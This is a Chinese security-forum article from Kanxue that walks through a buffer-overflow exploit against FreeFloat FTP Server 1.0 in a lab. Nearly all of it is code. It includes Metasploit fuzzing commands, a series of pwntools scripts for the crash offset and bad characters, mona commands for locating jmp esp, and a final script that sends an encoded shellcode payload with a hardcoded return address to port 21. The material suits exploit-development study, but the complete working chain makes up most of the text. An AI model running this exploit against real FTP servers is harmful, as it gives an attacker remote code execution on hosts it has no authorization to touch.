本文为看雪论坛优秀文章
看雪论坛作者ID:mb_uvhwamsn
一、漏洞信息
二、漏洞复现
(1) freefloatftpserver1.0
(3) Mona
(1) Pwntools
#打开metasploit
msfconsole
#查询可用的fuzz
search fuzzing
#使用ftp fuzz模块
use auxiliary/fuzzers/ftp/ftp_pre_post
#设置靶机
set RHOST 192.168.112.146
#漏洞利用
exploit
三、漏洞分析
from pwn import *
p = remote("192.168.112.146", 21)
paylad = 'A'*500
p.sendline(payload)
p.interactive()
from pwn import *
p = remote("192.168.112.146", 21)
payload = 'A'*(0xfc-1) + 'cccc'
p.sendline(payload)
p.interactive()
from pwn import *
p = remote('192.168.112.146',21)
bytearray = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
payload = 'a'*(0xfc-1) + 'cccc' + bytearray
p.sendline(payload)
p.interactive()
!mona jmp -r esp
#或者
!mona find -s "\xff\xe4" -m
from pwn import *
p = remote('192.168.112.146',21)
shellcode = (
"\xbf\xb9\x9b\xb3\x2f\xdb\xd2\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x53\x31\x78\x12\x83\xc0\x04\x03\xc1\x95\x51\xda\xcd\x42\x17"
"\x25\x2d\x93\x78\xaf\xc8\xa2\xb8\xcb\x99\x95\x08\x9f\xcf\x19"
"\xe2\xcd\xfb\xaa\x86\xd9\x0c\x1a\x2c\x3c\x23\x9b\x1d\x7c\x22"
"\x1f\x5c\x51\x84\x1e\xaf\xa4\xc5\x67\xd2\x45\x97\x30\x98\xf8"
"\x07\x34\xd4\xc0\xac\x06\xf8\x40\x51\xde\xfb\x61\xc4\x54\xa2"
"\xa1\xe7\xb9\xde\xeb\xff\xde\xdb\xa2\x74\x14\x97\x34\x5c\x64"
"\x58\x9a\xa1\x48\xab\xe2\xe6\x6f\x54\x91\x1e\x8c\xe9\xa2\xe5"
"\xee\x35\x26\xfd\x49\xbd\x90\xd9\x68\x12\x46\xaa\x67\xdf\x0c"
"\xf4\x6b\xde\xc1\x8f\x90\x6b\xe4\x5f\x11\x2f\xc3\x7b\x79\xeb"
"\x6a\xda\x27\x5a\x92\x3c\x88\x03\x36\x37\x25\x57\x4b\x1a\x22"
"\x94\x66\xa4\xb2\xb2\xf1\xd7\x80\x1d\xaa\x7f\xa9\xd6\x74\x78"
"\xce\xcc\xc1\x16\x31\xef\x31\x3f\xf6\xbb\x61\x57\xdf\xc3\xe9"
"\xa7\xe0\x11\x87\xaf\x47\xca\xba\x52\x37\xba\x7a\xfc\xd0\xd0"
"\x74\x23\xc0\xda\x5e\x4c\x69\x27\x61\x63\x36\xae\x87\xe9\xd6"
"\xe6\x10\x85\x14\xdd\xa8\x32\x66\x37\x81\xd4\x2f\x51\x16\xdb"
"\xaf\x77\x30\x4b\x24\x94\x84\x6a\x3b\xb1\xac\xfb\xac\x4f\x3d"
"\x4e\x4c\x4f\x14\x38\xed\xc2\xf3\xb8\x78\xff\xab\xef\x2d\x31"
"\xa2\x65\xc0\x68\x1c\x9b\x19\xec\x67\x1f\xc6\xcd\x66\x9e\x8b"
"\x6a\x4d\xb0\x55\x72\xc9\xe4\x09\x25\x87\x52\xec\x9f\x69\x0c"
"\xa6\x4c\x20\xd8\x3f\xbf\xf3\x9e\x3f\xea\x85\x7e\xf1\x43\xd0"
"\x81\x3e\x04\xd4\xfa\x22\xb4\x1b\xd1\xe6\xc4\x51\x7b\x4e\x4d"
"\x3c\xee\xd2\x10\xbf\xc5\x11\x2d\x3c\xef\xe9\xca\x5c\x9a\xec"
"\x97\xda\x77\x9d\x88\x8e\x77\x32\xa8\x9a")
# 0x77d29353 -> jmp esp
payload = 'a'*(0xfc-1) + "\x53\x93\xd2\x77" + "\x90"*16 + shellcode
p.sendline(payload)
p.interactive()
四、参考文献
1. https://www.exploit-db.com/exploits/23243
2. https://giantbranch.blog.csdn.net/article/details/53291788
3. https://www.youtube.com/watch?v=i6Br57lh4uE
看雪ID:mb_uvhwamsn
https://bbs.pediy.com/user-home-913279.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!